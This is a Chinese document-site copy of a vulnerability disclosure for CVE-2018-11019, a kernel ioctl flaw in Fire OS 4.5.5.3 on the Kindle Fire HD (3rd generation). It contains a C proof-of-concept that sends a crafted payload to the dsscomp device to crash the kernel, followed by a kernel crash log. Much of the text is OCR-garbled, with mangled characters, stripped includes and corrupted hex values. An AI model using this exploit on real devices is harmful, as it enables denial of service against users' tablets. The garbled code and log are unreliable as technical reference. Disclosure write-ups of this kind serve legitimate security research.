《(CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(10页珍藏版)》请在第一文库网上搜索。
1、(CVE-2018-11019)AmazonKind1eFireHD(3rd)FireOSkerne1组件安全漏洞一、漏洞简介AmazonKind1eFireHD(3rd)是美国亚马逊(AmaZOn)公司的一款FireOS平板电脑设备。FireOS是运行在其中的一套专用于AmaZOn设备的基于Android开发的移动操作系统。kerne1是其中的一个内核组件。AmazonKind1eFireHD(3rd)FireOS4.5.5.3版本中的kerne1组件的kerne1/omap/drivers/misc/gcx/gcioct1/gcif.c文件存在安全漏洞。攻击者可借助3221773726命令
2、利用该漏洞注入特制的参数,造成内核崩溃。二、漏洞影响FireOS4.5.5.3三、复现过程poc/* ThisispocofKind1eFireHD3rd* Abugintheioct1interfaceofdevicefi1edevdsscompcausesthesystemcrashviaIOCT11118064517.* Re1atedbuggystructnameisdsscomp_setup_dispc_data.* ThisPocshou1drunwithpermissiontodoioct1ondevdsscomp.* The-Fow11wingiskmsgofkerne1cra
3、shinfomation:*/#inc1ude#inc1ude#inc1ude#inc1udeconststaticchar*driver=devdsscomp;staticcommand=1118064517;intmain(intargc,char*argv,char*env)unsignedintpay1oad=Oxffffffffj0X00000003j05d200040,0x79900008,0x8f5928bd,0x78b02422,0X00000000j0ffffffff,0xf4c50400,0007fffff,08499f562,0ffff0400,0001b131dj0x6
4、0818210,0X00000007,0ffffffff,0X000000000x9da9041c,0cd980400,0001f03f4,0x00000007,0x2a34003f,07c80d8f3,0x63102627,0xc73643a8,0xa28f0665,0X00000000j0689e57b4j0x01ff0008,0x5e7324b1,0xae3b003f,0x0b174d86,0X00000400,0x2Iffff37,0xceb367a4j0x00000040,0x00000001j0xec000f9ej000000001,0x00000Iff,0X00000000,00
5、0000000,00000000f00425c069j0x038cc3bej00000000f,0x00000080,0xe5790100,05b1bffff,00000d355,0x0000c685,0xa0070000,00010ffff,0x00a0ff00,000000001,0xff490700j0x0832ad03,0x000000060X00000002,000000001j0x81f871C0,0x738019cbj0xbf47ffff,000000040j0X00000001,x7f190f33,0X00000001,0x8295769b,0X0000003f,0x869f2
6、295,0ffffffffj0xd673914fj0x05055800,0xed69b7d5j0X00000000,0x107ebbd,0xd214af8dj0xffff4a93,0x26450008,0x58df0000j0d16db084j0x03ff30dd,0X00000001,0x209aff3b,0xe7850800j0x00000002,0x30da815cj0x426f5105,00de109d7j02c1a65fcj0fcb3d75f,0X00000000,0X00000001,08066be5b0X00000002,0ffffffffj0x5cf232ecj0x680d14
7、69,0X000000010X00000020,0ffffffff,0X00000400,0xd1d12be8j0X02010200,001ffc16f,0xf6e237e6,0x007f0000,001ff08f8,0000f00f9j0xbad07695,0X00000000j0xbaff0000,0x24040040,0X000000060X00000004,0X00000000,0xbc2e9242,0x009f5f08,0x00800000?0X00000000j000000001,0xff8800ff,0X00000001,0X00000000,0000003f4,0x6faa84
8、72,0X00000400j0ec857dd5,0x00000000,0x00000040,0xffffffff,0x3f004874,0x0000b77a,0xec9acb95,0xfacc00010xffff0001,00080ffff,0x3600ff03,000000001,0x8fff7d7f,0x6b87075a,0X00000000,0X41414141,041414141j041414141,0x41414141,0X00100Iff,0X00000000j0X00000001j0ff1f0512,0X00000001j0x51e32167,0xc18c55ccj0X00000
9、000?0xffffffff,0xb4aaf12b0x86edfdbd,0X00000010,00000003fj0abff7b00,0xffff9ea3j0xb28e0040,0x000fffff,0x458603f4,0ffff007f,0xa9030f02,0X00000001j0x002Cffff,09e00cdffj000000004j041414141,041414141,0x41414141,0x41414141;intfd=0;fd=open(driverjO_RDWR);if(fddata1oca1tmp1og);return-1;)printf(Tryopen%swithc
10、ommand0x%x.n”,driver,command);printf(Systemwi11crashandreboot.n);if(ioct1(fdjcommand,Spay1oad)data1oca1tmp1og);return-1;c1ose(fd);return0;崩溃日志164.793151Unab1etohand1ekerne1NU11pointerdereferenceatvirtua1address00000037164.802459164.805664164.813415164.819458164.8272391)164.834686164.839416pgd=c26ec0
11、0000000037*pgd=82f42831,*pte=00000000j*ppte=00000000Interna1error:Oops:17#1PREEMPTSMPARMModu1es1inkedin:omap1fb(0)pvrsrvkm(O)pvr_1ogger(0)CPU:1Tainted:GO(3.4.83-gd2afc0bae69#PCisat1Risatdev-ioct1+04ac0x10c4down_timeout+0x40/0x5c164.844146164.844146164.857116164.8631280f164.87039100PC:SP:0:r7:r3:c25a
12、1e7000000000C0a25b5000001403Ir:psr:60000013iPr9r6:c25a1e50:d8caca8:c25a0000:00000000164.877807F1ags:nZCvIRQsonmentuserfp:c25a1f04r8:bed5c610r5:bed5c610r4:000000r1:20000013r0:000000FIQsonModeSVC_32ISAARMSeg164.885894Contro1:10c5387dTab1e:826ec04aDAC:00000015164.892303164.892333PC:0xc0317868:164.89730
13、8786830d22003f02e1a0200de3c26d7f33a03000e35300000a0001c5e3e0500deafff164.9079897888e3c6603f0001a000021e24b3064e5963008e295200830d2200333a03000e3530164.91867078a8e1a010050001a00001ee51b4060e3a02008e50b3088e1a00003ebfcfa5fe3500164.92935178c8e3020710c25e3500000Ia0002e0e59f7bdcebf4db32e1a010002870038ebf
14、55164.93988078e8e5943028004e5830000e5b23070e1a08000e5940024e1a02007e2841024e5803164.9505617908e5871070bb9e50b8060e50b8064e2420038e5831004e5843024e5842028ebf55164.9612127928ea000006387e3a03004e50b3064e24b1064e50b1088e51b0088e3a01008ebfd0164.9717717948e5963008fc5e1a00005e51b1088e295200830d2200333a03000e3530000Iafff164.982299164.9823301R:0xc006e938:164.987426e938e1a01000004eb18d7ade1a000050a000007e3a05000e2433001e5843008e1a00164.997955e958e24bd014018e1a05